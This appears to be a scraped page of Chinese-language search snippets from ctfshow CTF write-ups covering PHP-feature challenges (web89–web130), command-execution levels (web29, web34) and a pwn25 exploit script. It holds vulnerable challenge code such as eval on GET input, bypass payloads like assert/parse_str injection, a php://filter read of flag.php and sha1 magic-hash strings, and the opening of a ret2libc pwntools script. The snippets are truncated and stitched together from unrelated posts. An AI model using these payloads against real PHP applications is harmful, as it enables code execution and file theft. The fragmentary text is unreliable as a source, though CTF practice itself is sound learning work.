ctfshow web入门 php特性 web126-web130 1.web126 和前面一样的 payload: get: a=1+fl0g=flag_give_me post: CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1])或get: ?$fl0g=flag_give_me post:CTF_SHOW=&CTF[SHOW.COM=&fun=assert($a[0])assert($a[0]) 是把fl0g赋值为flag_give_me $...
Web130(正则匹配和首位出现判断)<?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); if(isset($_POST['f'])){ $f = $_POST['f']; if(preg_match('/.+?ctfshow/is', $f)){ die('bye!'); } if(stripos($f, 'ctfshow') === FALSE){ die('bye!!'); } ...
php ②伪协议 f=php://filter/read=convert.base64-encode|ctfshow/resource=flag.php web130(正则回溯) error_reporting(0); highlight_file(__FILE__); include("flag.php"); if(isset($_POST['f'])){ $f = $_POST['f']; if(preg_match('/.+?ctfshow/is', $f)){ die('bye!'); } ...
web130 利用正则最大回溯次数绕过 error_reporting(0);highlight_file(__FILE__);include("flag.php");if(isset($_POST['f'])){ $f = $_POST['f']; if(preg_match('/.+?ctfshow/is', $f)){ die('bye!'); } if(stripos($f, 'ctfshow') === FALSE){ die('bye!!'); } echo $flag...
1.web89 intval函数的利用,intval函数获取变量的整数值,失败时返回0,空的数组返回,非空数组返回1 num[]=1 intval ( mixed $var [, int $base = 10 ] ) : int Note: 如果 base 是 0,通过检测 var 的格式来决定使用
web34语言结构:不需要使用括号的函数 echo print isset unset include require过滤了: flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\ 比上面多了( : 因为上面的payload本来就没有使用到( :,所以直接用上面的payload即可因为过滤的是$c,所以我们输入的a是没得影响的...
io.interactive() pwn25 frompwnimport*fromLibcSearcherimport*# 打印调试信息context.log_level ='debug'# 建立连接p = remote("pwn.challenge.ctf.show","28111") elf = ELF("./pwn")# 溢出偏移地址offset =0x84+0x4+0x4# main函数地址main_addr = elf.symbols['main']# plt表中puts函数地址puts_pl...
ctfshow web入门php特性 回到顶部 php特性 web89 include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){$num=$_GET['num'];if(preg_match("/[0-9]/",$num)){die("no no no!"); }if(intval($num)){echo$flag;...
4.web106 数组可以绕过,sha1不处理数组 payload: v2[]=1v1[]=2或者v1和v2随便用下面的一个,科学计数法为0aaroZmOk0e76658526655756207688271159624026011393aaK1STfY0e66507019969427134894567494305185566735aaO8zKZFaa3OFF9m 5.web107 parse_str将字符串解析成多个变量 ...
ctfshow_web入门 命令执行(全)——学习 命令执行 刚刚开始学习命令执行,萌新一个 因为是学习嘛,所以东西写的杂乱了 web 29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c);...